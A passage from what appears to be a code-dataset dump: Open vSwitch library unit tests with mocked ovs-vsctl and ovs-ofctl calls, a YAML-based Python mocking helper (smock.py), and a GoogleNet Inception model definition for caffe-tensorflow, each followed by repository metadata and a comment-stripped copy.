                      root_helper=self.root_helper).AndReturn('ignore'
                                                             '\nflow-1\n')
        self.mox.ReplayAll()
        # counts the number of flows as total lines of output - 2
        self.assertEqual(self.br.count_flows(), 1)
        self.mox.VerifyAll()

    def test_delete_flow(self):
        """delete_flows() builds one del-flows match per keyword."""
        ofport = "5"
        lsw_id = 40
        vid = 39
        utils.execute(["ovs-ofctl", "del-flows", self.BR_NAME,
                       "in_port=" + ofport], root_helper=self.root_helper)
        utils.execute(["ovs-ofctl", "del-flows", self.BR_NAME,
                       "tun_id=%s" % lsw_id], root_helper=self.root_helper)
        utils.execute(["ovs-ofctl", "del-flows", self.BR_NAME,
                       "dl_vlan=%s" % vid], root_helper=self.root_helper)
        self.mox.ReplayAll()
        self.br.delete_flows(in_port=ofport)
        self.br.delete_flows(tun_id=lsw_id)
        self.br.delete_flows(dl_vlan=vid)
        self.mox.VerifyAll()

    def test_add_tunnel_port(self):
        """add_tunnel_port() configures a flow-keyed GRE interface."""
        pname = "tap99"
        ip = "9.9.9.9"
        ofport = "6"
        utils.execute(["ovs-vsctl", self.TO, "add-port",
                       self.BR_NAME, pname], root_helper=self.root_helper)
        utils.execute(["ovs-vsctl", self.TO, "set", "Interface",
                       pname, "type=gre"], root_helper=self.root_helper)
        utils.execute(["ovs-vsctl", self.TO, "set", "Interface",
                       pname, "options:remote_ip=" + ip],
                      root_helper=self.root_helper)
        utils.execute(["ovs-vsctl", self.TO, "set", "Interface",
                       pname, "options:in_key=flow"],
                      root_helper=self.root_helper)
        utils.execute(["ovs-vsctl", self.TO, "set", "Interface",
                       pname, "options:out_key=flow"],
                      root_helper=self.root_helper)
        utils.execute(["ovs-vsctl", self.TO, "get",
                       "Interface", pname, "ofport"],
                      root_helper=self.root_helper).AndReturn(ofport)
        self.mox.ReplayAll()
        self.assertEqual(self.br.add_tunnel_port(pname, ip), ofport)
        self.mox.VerifyAll()

    def test_add_patch_port(self):
        """add_patch_port() creates a patch interface peered to another."""
        pname = "tap99"
        peer = "bar10"
        ofport = "6"
        utils.execute(["ovs-vsctl", self.TO, "add-port",
                       self.BR_NAME, pname], root_helper=self.root_helper)
        utils.execute(["ovs-vsctl", self.TO, "set", "Interface",
                       pname, "type=patch"], root_helper=self.root_helper)
        utils.execute(["ovs-vsctl", self.TO, "set",
                       "Interface", pname, "options:peer=" + peer],
                      root_helper=self.root_helper)
        utils.execute(["ovs-vsctl", self.TO, "get",
                       "Interface", pname, "ofport"],
                      root_helper=self.root_helper).AndReturn(ofport)
        self.mox.ReplayAll()
        self.assertEqual(self.br.add_patch_port(pname, peer), ofport)
        self.mox.VerifyAll()

    def _test_get_vif_ports(self, is_xen=False):
        """Shared body: get_vif_ports() parses one attached VIF.

        On Xen the VIF id lives in xs-vif-uuid and must be resolved
        through an extra `xe vif-param-get` call.
        """
        pname = "tap99"
        ofport = "6"
        vif_id = uuidutils.generate_uuid()
        mac = "ca:fe:de:ad:be:ef"
        utils.execute(["ovs-vsctl", self.TO, "list-ports", self.BR_NAME],
                      root_helper=self.root_helper).AndReturn("%s\n" % pname)
        if is_xen:
            external_ids = ('{xs-vif-uuid="%s", attached-mac="%s"}'
                            % (vif_id, mac))
        else:
            external_ids = ('{iface-id="%s", attached-mac="%s"}'
                            % (vif_id, mac))
        utils.execute(["ovs-vsctl", self.TO, "get",
                       "Interface", pname, "external_ids"],
                      root_helper=self.root_helper).AndReturn(external_ids)
        utils.execute(["ovs-vsctl", self.TO, "get",
                       "Interface", pname, "ofport"],
                      root_helper=self.root_helper).AndReturn(ofport)
        if is_xen:
            utils.execute(["xe", "vif-param-get", "param-name=other-config",
                           "param-key=nicira-iface-id", "uuid=" + vif_id],
                          root_helper=self.root_helper).AndReturn(vif_id)
        self.mox.ReplayAll()
        ports = self.br.get_vif_ports()
        self.assertEqual(1, len(ports))
        self.assertEqual(ports[0].port_name, pname)
        self.assertEqual(ports[0].ofport, ofport)
        self.assertEqual(ports[0].vif_id, vif_id)
        self.assertEqual(ports[0].vif_mac, mac)
        self.assertEqual(ports[0].switch.br_name, self.BR_NAME)
        self.mox.VerifyAll()

    def test_get_vif_ports_nonxen(self):
        self._test_get_vif_ports(False)

    def test_get_vif_ports_xen(self):
        self._test_get_vif_ports(True)

    def test_clear_db_attribute(self):
        """clear_db_attribute() clears a column via ovs-vsctl."""
        pname = "tap77"
        utils.execute(["ovs-vsctl", self.TO, "clear", "Port",
                       pname, "tag"], root_helper=self.root_helper)
        self.mox.ReplayAll()
        self.br.clear_db_attribute("Port", pname, "tag")
        self.mox.VerifyAll()

    def test_port_id_regex(self):
        """re_id extracts mac, vif id, port name and ofport from list output."""
        result = ('external_ids        : {attached-mac="fa:16:3e:23:5b:f2",'
                  ' iface-id="5c1321a7-c73f-4a77-95e6-9f86402e5c8f",'
                  ' iface-status=active}\nname                :'
                  ' "dhc5c1321a7-c7"\nofport              : 2\n')
        match = self.br.re_id.search(result)
        vif_mac = match.group('vif_mac')
        vif_id = match.group('vif_id')
        port_name = match.group('port_name')
        ofport = int(match.group('ofport'))
        self.assertEqual(vif_mac, 'fa:16:3e:23:5b:f2')
        self.assertEqual(vif_id, '5c1321a7-c73f-4a77-95e6-9f86402e5c8f')
        self.assertEqual(port_name, 'dhc5c1321a7-c7')
        self.assertEqual(ofport, 2)

    def test_iface_to_br(self):
        """get_bridge_for_iface() returns the bridge reported by ovs-vsctl."""
        iface = 'tap0'
        br = 'br-int'
        root_helper = 'sudo'
        utils.execute(["ovs-vsctl", self.TO, "iface-to-br", iface],
                      root_helper=root_helper).AndReturn('br-int')
        self.mox.ReplayAll()
        self.assertEqual(ovs_lib.get_bridge_for_iface(root_helper, iface), br)
        self.mox.VerifyAll()

    def test_iface_to_br_handles_exception(self):
        """get_bridge_for_iface() returns None when ovs-vsctl fails.

        This method used to be a second `test_iface_to_br` definition,
        which shadowed the success-path test above so it never ran.
        """
        iface = 'tap0'
        root_helper = 'sudo'
        utils.execute(["ovs-vsctl", self.TO, "iface-to-br", iface],
                      root_helper=root_helper).AndRaise(Exception)
        self.mox.ReplayAll()
        self.assertIsNone(ovs_lib.get_bridge_for_iface(root_helper, iface))
        self.mox.VerifyAll()

    def test_delete_all_ports(self):
        """delete_ports(all_ports=True) removes every listed port."""
        self.mox.StubOutWithMock(self.br, 'get_port_name_list')
        self.br.get_port_name_list().AndReturn(['port1'])
        self.mox.StubOutWithMock(self.br, 'delete_port')
        self.br.delete_port('port1')
        self.mox.ReplayAll()
        self.br.delete_ports(all_ports=True)
        self.mox.VerifyAll()

    def test_delete_quantum_ports(self):
        """delete_ports(all_ports=False) removes only VIF-backed ports."""
        port1 = ovs_lib.VifPort('tap1234', 1, uuidutils.generate_uuid(),
                                'ca:fe:de:ad:be:ef', 'br')
        port2 = ovs_lib.VifPort('tap5678', 2, uuidutils.generate_uuid(),
                                'ca:ee:de:ad:be:ef', 'br')
        self.mox.StubOutWithMock(self.br, 'get_vif_ports')
        self.br.get_vif_ports().AndReturn([port1, port2])
        self.mox.StubOutWithMock(self.br, 'delete_port')
        self.br.delete_port('tap1234')
        self.br.delete_port('tap5678')
        self.mox.ReplayAll()
        self.br.delete_ports(all_ports=False)
        self.mox.VerifyAll()

    def test_get_bridges(self):
        """get_bridges() splits the list-br output into bridge names."""
        bridges = ['br-int', 'br-ex']
        root_helper = 'sudo'
        utils.execute(["ovs-vsctl", self.TO, "list-br"],
                      root_helper=root_helper).AndReturn('br-int\nbr-ex\n')
        self.mox.ReplayAll()
        self.assertEqual(ovs_lib.get_bridges(root_helper), bridges)
        self.mox.VerifyAll()
| true
| true
|
790c759b73c878a7b39473583ec0ffc5dfbb10f0
| 6,196
|
py
|
Python
|
smock.py
|
serverboards/serverboards-plugin-google-drive
|
2295df2c8c42d1667e80d00d2038aabd2fe15b62
|
[
"Apache-2.0"
] | null | null | null |
smock.py
|
serverboards/serverboards-plugin-google-drive
|
2295df2c8c42d1667e80d00d2038aabd2fe15b62
|
[
"Apache-2.0"
] | null | null | null |
smock.py
|
serverboards/serverboards-plugin-google-drive
|
2295df2c8c42d1667e80d00d2038aabd2fe15b62
|
[
"Apache-2.0"
] | null | null | null |
import json
import yaml
"""
SMock -- Serverboards Mock library -- Mock comfortably.
This library helps to mock function and method calls, getting the data
from an external yaml file.
"""
class MockWrapper:
    """
    Wraps all the data returned by the mocked function to behave like a
    dictionary, like an object, like a function, like a jsonable dict...
    like almost everything you may need
    """
    def __init__(self, data):
        # Stored under a name-mangled attribute (_MockWrapper__data) so it
        # can never collide with keys of the wrapped payload.
        self.__data = data
    def __getattr__(self, key):
        # Attribute access falls back to dict-style lookup on the payload.
        # NOTE(review): raises KeyError instead of AttributeError, so
        # hasattr()/getattr(obj, k, default) will not work as usual on
        # wrappers — confirm callers depend on this before changing it.
        if key not in self.__data:
            raise KeyError("'%s' not found in %s" % (key, self.__data.keys()))
        return self.__getitem__(key)
    def __call__(self):
        # Calling a wrapper re-wraps the same payload, which lets mocked
        # method-style accesses (e.g. response.json()) be invoked.
        return wrapped(self.__data)
    def __getitem__(self, key):
        # Scalars pass through unwrapped; containers are wrapped again so
        # nested lookups keep the same convenience behaviour.
        val = self.__data[key]
        if isinstance(val, (int, str)):
            return val
        return wrapped(val)
    def __str__(self):
        return str(self.__data)
    def __repr__(self):
        return repr(self.__data)
    # Comparisons and length are delegated to the underlying payload so a
    # wrapper compares equal to the raw data it wraps.
    def __eq__(self, other):
        return self.__data.__eq__(other)
    def __le__(self, other):
        return self.__data.__le__(other)
    def __ge__(self, other):
        return self.__data.__ge__(other)
    def __lt__(self, other):
        return self.__data.__lt__(other)
    def __gt__(self, other):
        return self.__data.__gt__(other)
    def __len__(self):
        return self.__data.__len__()
    # dict-like API so wrappers can be passed where mappings are expected.
    def keys(self):
        return self.__data.keys()
    def get(self, key, defv=None):
        return self.__data.get(key, defv)
class MockWrapperList(MockWrapper, list):
    """A real list that also carries the MockWrapper conveniences."""
    def __init__(self, data):
        # Initialise both bases explicitly (MRO: MockWrapper, then list).
        for base_cls in (MockWrapper, list):
            base_cls.__init__(self, data)
class MockWrapperDict(MockWrapper, dict):
    """A real dict that also carries the MockWrapper conveniences."""
    def __init__(self, data):
        # Initialise both bases explicitly (MRO: MockWrapper, then dict).
        for base_cls in (MockWrapper, dict):
            base_cls.__init__(self, data)
def wrapped(data):
    """Wrap *data* in the MockWrapper flavour that matches its type."""
    wrapper_cls = MockWrapper
    if isinstance(data, dict):
        wrapper_cls = MockWrapperDict
    elif isinstance(data, list):
        wrapper_cls = MockWrapperList
    return wrapper_cls(data)
def mock_match(A, B):
    """
    Checked for params on a mocked function is as expected

    It is necesary as sometimes we get a tuple and at the mock data we have
    lists.  ``B`` may be the wildcard string ``"*"``, which matches anything;
    inside a sequence each element may itself be ``"*"``.

    Examples:

    ```
    >>> mock_match("A", "A")
    True
    >>> mock_match("A", "B")
    False
    >>> mock_match(["A", "B", "C"], ["A", "B", "C"])
    True
    >>> mock_match(["A", "B", "C"], "*")
    True
    ```
    """
    if B == '*':  # always match
        return True
    if isinstance(A, (tuple, list)):
        # The expectation must be a sequence of the same length.  Bare
        # zip() would silently truncate, so a shorter expectation used to
        # prefix-match, and a non-sequence B (e.g. a missing "args" key)
        # raised TypeError instead of simply not matching.
        if not isinstance(B, (tuple, list)) or len(A) != len(B):
            return False
        return all(mock_match(a, b) for (a, b) in zip(A, B))
    return A == B
def mock_res(name, data, args=[], kwargs={}):
    """
    Given a name, data and call parameters, returns the mocked response

    If there is no matching response, raises an exception that can be used to
    prepare the mock data.

    This can be used for situations where you mock some function like data;
    for example at [Serverboards](https://serverboards.io), we use it to
    mock RPC calls.

    Its also used internally on every other mocking.

    (The list/dict defaults are never mutated, so sharing them across
    calls is safe here.)
    """
    # Keep `data` as the whole mock mapping; look the per-name call list
    # up under a distinct variable instead of shadowing the parameter.
    candidates = data.get(name)
    if not candidates:
        raise Exception(
            "unknown method for mocking: \n%s:\n - args: %s\n kwargs: %s\n response: ...\n" % (
                name, json.dumps(args), json.dumps(kwargs)
            )
        )
    for res in candidates:
        # First recorded call whose args AND kwargs both match wins.
        if (mock_match(args, res.get("args")) and
                mock_match(kwargs, res.get("kwargs", {}))):
            if 'error' in res:
                # A recorded error entry is replayed as an exception.
                raise Exception(res["error"])
            response = res["response"]
            if isinstance(response, (int, str)):
                return response  # scalars pass through unwrapped
            return wrapped(response)
    raise Exception(
        "unknown data for mocking: \n%s:\n - args: %s\n kwargs: %s\n response: ...\n" % (
            name, json.dumps(args), json.dumps(kwargs)
        )
    )
def mock_method(name, data):
    """
    Returns a function that mocks an original function.
    """
    def _mocked(*call_args, **call_kwargs):
        # Delegate every invocation to the canned-response lookup.
        return mock_res(name, data, call_args, call_kwargs)
    return _mocked
def mock_method_async(name, data):
    """
    Returns an async function that mocks an original async function
    """
    async def _amocked(*call_args, **call_kwargs):
        # Resolution itself is synchronous; the coroutine wrapper only
        # makes the mock awaitable like the function it replaces.
        return mock_res(name, data, call_args, call_kwargs)
    return _amocked
class SMock:
    """
    Encapsulates mocking calls so it's easier to load data and mock methods

    Example:

    ```python
    >>> import requests
    >>> smocked = SMock("tests/data.yaml")
    >>> requests.get = smocked.mock_method("requests.get")
    >>> res = requests.get("https://mocked.url")
    >>> res.status_code
    200
    >>> res.content
    'Gocha!'
    >>> res.json()
    {'text': 'Gocha too!'}
    ```

    The mock file is a yaml file with each mocked function as keys, and
    `args`/`kwargs` as calling args and kwargs, and `response` the response.

    Check `tests/data.yaml` for an example at the source code.
    """
    def __init__(self, mockfile):
        """Load the YAML mock-data file at *mockfile*."""
        with open(mockfile) as fd:
            # safe_load: plain mock data never needs arbitrary Python
            # tags, and yaml.load() with no Loader argument is unsafe on
            # old PyYAML and a TypeError on PyYAML >= 6.
            self._data = yaml.safe_load(fd)

    def mock_res(self, name, args=[], kwargs={}):
        """
        Calls `mock_res`

        Mock by args:

        ```
        >>> smock = SMock("tests/data.yaml")
        >>> res = smock.mock_res("requests.get", ["https://mocked.url"])
        >>> res.status_code
        200
        ```

        Using "*" as args, as fallback. As there is no kwargs, use default:

        ```
        >>> res = smock.mock_res("requests.get", ["https://error.mocked.url"])
        >>> res.status_code
        404
        ```

        Using "*" as kwargs:

        ```
        >>> res = smock.mock_res("requests.get",
        ...                      ["https://mocked.url"],
        ...                      {'data': 'data'})
        >>> res.status_code
        200
        >>> res.content
        'Mocked query'
        ```
        """
        return mock_res(name, self._data, args, kwargs)

    def mock_method(self, name):
        """
        Calls `mock_method`
        """
        return mock_method(name, self._data)

    async def mock_method_async(self, name):
        """
        Calls `mock_method_async`

        Note: module-level mock_method_async() is a plain function that
        *returns* the async mock, so it must not be awaited here — the
        previous ``await`` raised TypeError on every call.
        """
        return mock_method_async(name, self._data)
| 25.497942
| 102
| 0.576017
|
import json
import yaml
class MockWrapper:
def __init__(self, data):
self.__data = data
def __getattr__(self, key):
if key not in self.__data:
raise KeyError("'%s' not found in %s" % (key, self.__data.keys()))
return self.__getitem__(key)
def __call__(self):
return wrapped(self.__data)
def __getitem__(self, key):
val = self.__data[key]
if isinstance(val, (int, str)):
return val
return wrapped(val)
def __str__(self):
return str(self.__data)
def __repr__(self):
return repr(self.__data)
def __eq__(self, other):
return self.__data.__eq__(other)
def __le__(self, other):
return self.__data.__le__(other)
def __ge__(self, other):
return self.__data.__ge__(other)
def __lt__(self, other):
return self.__data.__lt__(other)
def __gt__(self, other):
return self.__data.__gt__(other)
def __len__(self):
return self.__data.__len__()
def keys(self):
return self.__data.keys()
def get(self, key, defv=None):
return self.__data.get(key, defv)
class MockWrapperList(MockWrapper, list):
def __init__(self, data):
MockWrapper.__init__(self, data)
list.__init__(self, data)
class MockWrapperDict(MockWrapper, dict):
def __init__(self, data):
MockWrapper.__init__(self, data)
dict.__init__(self, data)
def wrapped(data):
if isinstance(data, dict):
return MockWrapperDict(data)
if isinstance(data, list):
return MockWrapperList(data)
return MockWrapper(data)
def mock_match(A, B):
if B == '*':
return True
if isinstance(A, (tuple, list)):
return all(mock_match(a, b) for (a, b) in zip(A, B))
return A == B
def mock_res(name, data, args=[], kwargs={}):
data = data.get(name)
if not data:
raise Exception(
"unknown method for mocking: \n%s:\n - args: %s\n kwargs: %s\n response: ...\n" % (
name, json.dumps(args), json.dumps(kwargs)
)
)
for res in data:
if (mock_match(args, res.get("args")) and
mock_match(kwargs, res.get("kwargs", {}))):
if 'error' in res:
raise Exception(res["error"])
response = res["response"]
if isinstance(response, (int, str)):
return response
return wrapped(response)
raise Exception(
"unknown data for mocking: \n%s:\n - args: %s\n kwargs: %s\n response: ...\n" % (
name, json.dumps(args), json.dumps(kwargs)
)
)
def mock_method(name, data):
def mockf(*args, **kwargs):
return mock_res(name, data, args, kwargs)
return mockf
def mock_method_async(name, data):
async def mockf(*args, **kwargs):
return mock_res(name, data, args, kwargs)
return mockf
class SMock:
def __init__(self, mockfile):
with open(mockfile) as fd:
self._data = yaml.load(fd)
def mock_res(self, name, args=[], kwargs={}):
return mock_res(name, self._data, args, kwargs)
def mock_method(self, name):
return mock_method(name, self._data)
async def mock_method_async(self, name):
return await mock_method_async(name, self._data)
| true
| true
|
790c77c112f04ac750b068e50533564b671bd615
| 7,851
|
py
|
Python
|
caffe-tensorflow/examples/imagenet/models/googlenet.py
|
petercheng00/PSPNet-Keras-tensorflow
|
d50583786a3e8782dd1b735d268e57392cd8c646
|
[
"MIT"
] | 3,209
|
2015-11-10T06:52:59.000Z
|
2022-03-10T05:17:28.000Z
|
caffe-tensorflow/examples/imagenet/models/googlenet.py
|
petercheng00/PSPNet-Keras-tensorflow
|
d50583786a3e8782dd1b735d268e57392cd8c646
|
[
"MIT"
] | 174
|
2015-11-10T21:32:54.000Z
|
2021-11-09T15:51:30.000Z
|
caffe-tensorflow/examples/imagenet/models/googlenet.py
|
petercheng00/PSPNet-Keras-tensorflow
|
d50583786a3e8782dd1b735d268e57392cd8c646
|
[
"MIT"
] | 1,218
|
2015-11-10T23:55:48.000Z
|
2022-01-07T07:36:57.000Z
|
from kaffe.tensorflow import Network
class GoogleNet(Network):
    """GoogleNet (Inception v1) topology in the kaffe chaining DSL.

    Each ``self.feed(...)`` call selects the input layer(s) for the chain
    that follows; layer names mirror the original Caffe prototxt.  Every
    inception module declares four parallel branches (1x1, 3x3-reduce+3x3,
    5x5-reduce+5x5, pool+projection) and merges them with a channel-axis
    concat.
    """
    def setup(self):
        # Stem: conv/pool/LRN layers before the first inception module,
        # plus the 1x1 branch of inception 3a.
        (self.feed('data')
             .conv(7, 7, 64, 2, 2, name='conv1_7x7_s2')
             .max_pool(3, 3, 2, 2, name='pool1_3x3_s2')
             .lrn(2, 2e-05, 0.75, name='pool1_norm1')
             .conv(1, 1, 64, 1, 1, name='conv2_3x3_reduce')
             .conv(3, 3, 192, 1, 1, name='conv2_3x3')
             .lrn(2, 2e-05, 0.75, name='conv2_norm2')
             .max_pool(3, 3, 2, 2, name='pool2_3x3_s2')
             .conv(1, 1, 64, 1, 1, name='inception_3a_1x1'))

        # inception 3a: remaining branches and merge
        (self.feed('pool2_3x3_s2')
             .conv(1, 1, 96, 1, 1, name='inception_3a_3x3_reduce')
             .conv(3, 3, 128, 1, 1, name='inception_3a_3x3'))

        (self.feed('pool2_3x3_s2')
             .conv(1, 1, 16, 1, 1, name='inception_3a_5x5_reduce')
             .conv(5, 5, 32, 1, 1, name='inception_3a_5x5'))

        (self.feed('pool2_3x3_s2')
             .max_pool(3, 3, 1, 1, name='inception_3a_pool')
             .conv(1, 1, 32, 1, 1, name='inception_3a_pool_proj'))

        (self.feed('inception_3a_1x1',
                   'inception_3a_3x3',
                   'inception_3a_5x5',
                   'inception_3a_pool_proj')
             .concat(3, name='inception_3a_output')
             .conv(1, 1, 128, 1, 1, name='inception_3b_1x1'))

        # inception 3b
        (self.feed('inception_3a_output')
             .conv(1, 1, 128, 1, 1, name='inception_3b_3x3_reduce')
             .conv(3, 3, 192, 1, 1, name='inception_3b_3x3'))

        (self.feed('inception_3a_output')
             .conv(1, 1, 32, 1, 1, name='inception_3b_5x5_reduce')
             .conv(5, 5, 96, 1, 1, name='inception_3b_5x5'))

        (self.feed('inception_3a_output')
             .max_pool(3, 3, 1, 1, name='inception_3b_pool')
             .conv(1, 1, 64, 1, 1, name='inception_3b_pool_proj'))

        # merge 3b, downsample, start inception 4a
        (self.feed('inception_3b_1x1',
                   'inception_3b_3x3',
                   'inception_3b_5x5',
                   'inception_3b_pool_proj')
             .concat(3, name='inception_3b_output')
             .max_pool(3, 3, 2, 2, name='pool3_3x3_s2')
             .conv(1, 1, 192, 1, 1, name='inception_4a_1x1'))

        # inception 4a
        (self.feed('pool3_3x3_s2')
             .conv(1, 1, 96, 1, 1, name='inception_4a_3x3_reduce')
             .conv(3, 3, 208, 1, 1, name='inception_4a_3x3'))

        (self.feed('pool3_3x3_s2')
             .conv(1, 1, 16, 1, 1, name='inception_4a_5x5_reduce')
             .conv(5, 5, 48, 1, 1, name='inception_4a_5x5'))

        (self.feed('pool3_3x3_s2')
             .max_pool(3, 3, 1, 1, name='inception_4a_pool')
             .conv(1, 1, 64, 1, 1, name='inception_4a_pool_proj'))

        (self.feed('inception_4a_1x1',
                   'inception_4a_3x3',
                   'inception_4a_5x5',
                   'inception_4a_pool_proj')
             .concat(3, name='inception_4a_output')
             .conv(1, 1, 160, 1, 1, name='inception_4b_1x1'))

        # inception 4b
        (self.feed('inception_4a_output')
             .conv(1, 1, 112, 1, 1, name='inception_4b_3x3_reduce')
             .conv(3, 3, 224, 1, 1, name='inception_4b_3x3'))

        (self.feed('inception_4a_output')
             .conv(1, 1, 24, 1, 1, name='inception_4b_5x5_reduce')
             .conv(5, 5, 64, 1, 1, name='inception_4b_5x5'))

        (self.feed('inception_4a_output')
             .max_pool(3, 3, 1, 1, name='inception_4b_pool')
             .conv(1, 1, 64, 1, 1, name='inception_4b_pool_proj'))

        (self.feed('inception_4b_1x1',
                   'inception_4b_3x3',
                   'inception_4b_5x5',
                   'inception_4b_pool_proj')
             .concat(3, name='inception_4b_output')
             .conv(1, 1, 128, 1, 1, name='inception_4c_1x1'))

        # inception 4c
        (self.feed('inception_4b_output')
             .conv(1, 1, 128, 1, 1, name='inception_4c_3x3_reduce')
             .conv(3, 3, 256, 1, 1, name='inception_4c_3x3'))

        (self.feed('inception_4b_output')
             .conv(1, 1, 24, 1, 1, name='inception_4c_5x5_reduce')
             .conv(5, 5, 64, 1, 1, name='inception_4c_5x5'))

        (self.feed('inception_4b_output')
             .max_pool(3, 3, 1, 1, name='inception_4c_pool')
             .conv(1, 1, 64, 1, 1, name='inception_4c_pool_proj'))

        (self.feed('inception_4c_1x1',
                   'inception_4c_3x3',
                   'inception_4c_5x5',
                   'inception_4c_pool_proj')
             .concat(3, name='inception_4c_output')
             .conv(1, 1, 112, 1, 1, name='inception_4d_1x1'))

        # inception 4d
        (self.feed('inception_4c_output')
             .conv(1, 1, 144, 1, 1, name='inception_4d_3x3_reduce')
             .conv(3, 3, 288, 1, 1, name='inception_4d_3x3'))

        (self.feed('inception_4c_output')
             .conv(1, 1, 32, 1, 1, name='inception_4d_5x5_reduce')
             .conv(5, 5, 64, 1, 1, name='inception_4d_5x5'))

        (self.feed('inception_4c_output')
             .max_pool(3, 3, 1, 1, name='inception_4d_pool')
             .conv(1, 1, 64, 1, 1, name='inception_4d_pool_proj'))

        (self.feed('inception_4d_1x1',
                   'inception_4d_3x3',
                   'inception_4d_5x5',
                   'inception_4d_pool_proj')
             .concat(3, name='inception_4d_output')
             .conv(1, 1, 256, 1, 1, name='inception_4e_1x1'))

        # inception 4e
        (self.feed('inception_4d_output')
             .conv(1, 1, 160, 1, 1, name='inception_4e_3x3_reduce')
             .conv(3, 3, 320, 1, 1, name='inception_4e_3x3'))

        (self.feed('inception_4d_output')
             .conv(1, 1, 32, 1, 1, name='inception_4e_5x5_reduce')
             .conv(5, 5, 128, 1, 1, name='inception_4e_5x5'))

        (self.feed('inception_4d_output')
             .max_pool(3, 3, 1, 1, name='inception_4e_pool')
             .conv(1, 1, 128, 1, 1, name='inception_4e_pool_proj'))

        # merge 4e, downsample, start inception 5a
        (self.feed('inception_4e_1x1',
                   'inception_4e_3x3',
                   'inception_4e_5x5',
                   'inception_4e_pool_proj')
             .concat(3, name='inception_4e_output')
             .max_pool(3, 3, 2, 2, name='pool4_3x3_s2')
             .conv(1, 1, 256, 1, 1, name='inception_5a_1x1'))

        # inception 5a
        (self.feed('pool4_3x3_s2')
             .conv(1, 1, 160, 1, 1, name='inception_5a_3x3_reduce')
             .conv(3, 3, 320, 1, 1, name='inception_5a_3x3'))

        (self.feed('pool4_3x3_s2')
             .conv(1, 1, 32, 1, 1, name='inception_5a_5x5_reduce')
             .conv(5, 5, 128, 1, 1, name='inception_5a_5x5'))

        (self.feed('pool4_3x3_s2')
             .max_pool(3, 3, 1, 1, name='inception_5a_pool')
             .conv(1, 1, 128, 1, 1, name='inception_5a_pool_proj'))

        (self.feed('inception_5a_1x1',
                   'inception_5a_3x3',
                   'inception_5a_5x5',
                   'inception_5a_pool_proj')
             .concat(3, name='inception_5a_output')
             .conv(1, 1, 384, 1, 1, name='inception_5b_1x1'))

        # inception 5b
        (self.feed('inception_5a_output')
             .conv(1, 1, 192, 1, 1, name='inception_5b_3x3_reduce')
             .conv(3, 3, 384, 1, 1, name='inception_5b_3x3'))

        (self.feed('inception_5a_output')
             .conv(1, 1, 48, 1, 1, name='inception_5b_5x5_reduce')
             .conv(5, 5, 128, 1, 1, name='inception_5b_5x5'))

        (self.feed('inception_5a_output')
             .max_pool(3, 3, 1, 1, name='inception_5b_pool')
             .conv(1, 1, 128, 1, 1, name='inception_5b_pool_proj'))

        # head: merge 5b, global average pool, classifier, softmax
        (self.feed('inception_5b_1x1',
                   'inception_5b_3x3',
                   'inception_5b_5x5',
                   'inception_5b_pool_proj')
             .concat(3, name='inception_5b_output')
             .avg_pool(7, 7, 1, 1, padding='VALID', name='pool5_7x7_s1')
             .fc(1000, relu=False, name='loss3_classifier')
             .softmax(name='prob'))
| 41.539683
| 72
| 0.531907
|
from kaffe.tensorflow import Network
class GoogleNet(Network):
def setup(self):
(self.feed('data')
.conv(7, 7, 64, 2, 2, name='conv1_7x7_s2')
.max_pool(3, 3, 2, 2, name='pool1_3x3_s2')
.lrn(2, 2e-05, 0.75, name='pool1_norm1')
.conv(1, 1, 64, 1, 1, name='conv2_3x3_reduce')
.conv(3, 3, 192, 1, 1, name='conv2_3x3')
.lrn(2, 2e-05, 0.75, name='conv2_norm2')
.max_pool(3, 3, 2, 2, name='pool2_3x3_s2')
.conv(1, 1, 64, 1, 1, name='inception_3a_1x1'))
(self.feed('pool2_3x3_s2')
.conv(1, 1, 96, 1, 1, name='inception_3a_3x3_reduce')
.conv(3, 3, 128, 1, 1, name='inception_3a_3x3'))
(self.feed('pool2_3x3_s2')
.conv(1, 1, 16, 1, 1, name='inception_3a_5x5_reduce')
.conv(5, 5, 32, 1, 1, name='inception_3a_5x5'))
(self.feed('pool2_3x3_s2')
.max_pool(3, 3, 1, 1, name='inception_3a_pool')
.conv(1, 1, 32, 1, 1, name='inception_3a_pool_proj'))
(self.feed('inception_3a_1x1',
'inception_3a_3x3',
'inception_3a_5x5',
'inception_3a_pool_proj')
.concat(3, name='inception_3a_output')
.conv(1, 1, 128, 1, 1, name='inception_3b_1x1'))
(self.feed('inception_3a_output')
.conv(1, 1, 128, 1, 1, name='inception_3b_3x3_reduce')
.conv(3, 3, 192, 1, 1, name='inception_3b_3x3'))
(self.feed('inception_3a_output')
.conv(1, 1, 32, 1, 1, name='inception_3b_5x5_reduce')
.conv(5, 5, 96, 1, 1, name='inception_3b_5x5'))
(self.feed('inception_3a_output')
.max_pool(3, 3, 1, 1, name='inception_3b_pool')
.conv(1, 1, 64, 1, 1, name='inception_3b_pool_proj'))
(self.feed('inception_3b_1x1',
'inception_3b_3x3',
'inception_3b_5x5',
'inception_3b_pool_proj')
.concat(3, name='inception_3b_output')
.max_pool(3, 3, 2, 2, name='pool3_3x3_s2')
.conv(1, 1, 192, 1, 1, name='inception_4a_1x1'))
(self.feed('pool3_3x3_s2')
.conv(1, 1, 96, 1, 1, name='inception_4a_3x3_reduce')
.conv(3, 3, 208, 1, 1, name='inception_4a_3x3'))
(self.feed('pool3_3x3_s2')
.conv(1, 1, 16, 1, 1, name='inception_4a_5x5_reduce')
.conv(5, 5, 48, 1, 1, name='inception_4a_5x5'))
(self.feed('pool3_3x3_s2')
.max_pool(3, 3, 1, 1, name='inception_4a_pool')
.conv(1, 1, 64, 1, 1, name='inception_4a_pool_proj'))
(self.feed('inception_4a_1x1',
'inception_4a_3x3',
'inception_4a_5x5',
'inception_4a_pool_proj')
.concat(3, name='inception_4a_output')
.conv(1, 1, 160, 1, 1, name='inception_4b_1x1'))
(self.feed('inception_4a_output')
.conv(1, 1, 112, 1, 1, name='inception_4b_3x3_reduce')
.conv(3, 3, 224, 1, 1, name='inception_4b_3x3'))
(self.feed('inception_4a_output')
.conv(1, 1, 24, 1, 1, name='inception_4b_5x5_reduce')
.conv(5, 5, 64, 1, 1, name='inception_4b_5x5'))
(self.feed('inception_4a_output')
.max_pool(3, 3, 1, 1, name='inception_4b_pool')
.conv(1, 1, 64, 1, 1, name='inception_4b_pool_proj'))
(self.feed('inception_4b_1x1',
'inception_4b_3x3',
'inception_4b_5x5',
'inception_4b_pool_proj')
.concat(3, name='inception_4b_output')
.conv(1, 1, 128, 1, 1, name='inception_4c_1x1'))
(self.feed('inception_4b_output')
.conv(1, 1, 128, 1, 1, name='inception_4c_3x3_reduce')
.conv(3, 3, 256, 1, 1, name='inception_4c_3x3'))
(self.feed('inception_4b_output')
